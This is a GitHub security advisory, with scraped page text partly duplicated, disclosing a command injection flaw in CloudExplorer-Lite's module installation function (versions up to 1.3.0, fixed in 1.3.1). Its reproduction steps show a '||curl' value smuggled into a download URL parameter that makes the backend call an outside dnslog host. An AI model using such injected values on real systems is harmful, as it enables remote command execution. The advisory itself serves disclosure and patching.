You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
After sending the request, dnslog successfully accepted the request, proving that the backend host successfully executed the command curl http://wwww.aa.com
Affected versions: <= 1.3.0.
Patches
The vulnerability has been fixed in v1.3.1.
Workarounds
It is recommended to upgrade the version to v1.3.1.
References
If you have any questions or comments about this advisory:
Impact
Command injection vulnerability in installation function in module management.
The reproduction steps are as follows:
||Curl http://wwww.aa.com
Curl - SL | | curl http://wwww.aa.com -O/opt/cloudexplorer/downloads/$_ File | | exit 1
Call this interface to download_ URL parameter passed in | | curl http://wwww.aa.com , have the backend host execute curl http://wwww.aa.com , set here http://wwww.aa.com Is the dnslog address.
After sending the request, dnslog successfully accepted the request, proving that the backend host successfully executed the command curl http://wwww.aa.com
Affected versions: <= 1.3.0.
Patches
The vulnerability has been fixed in v1.3.1.
Workarounds
It is recommended to upgrade the version to v1.3.1.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/CloudExplorer-Dev/CloudExplorer-Lite
Email us at xin.bai@fit2cloud.com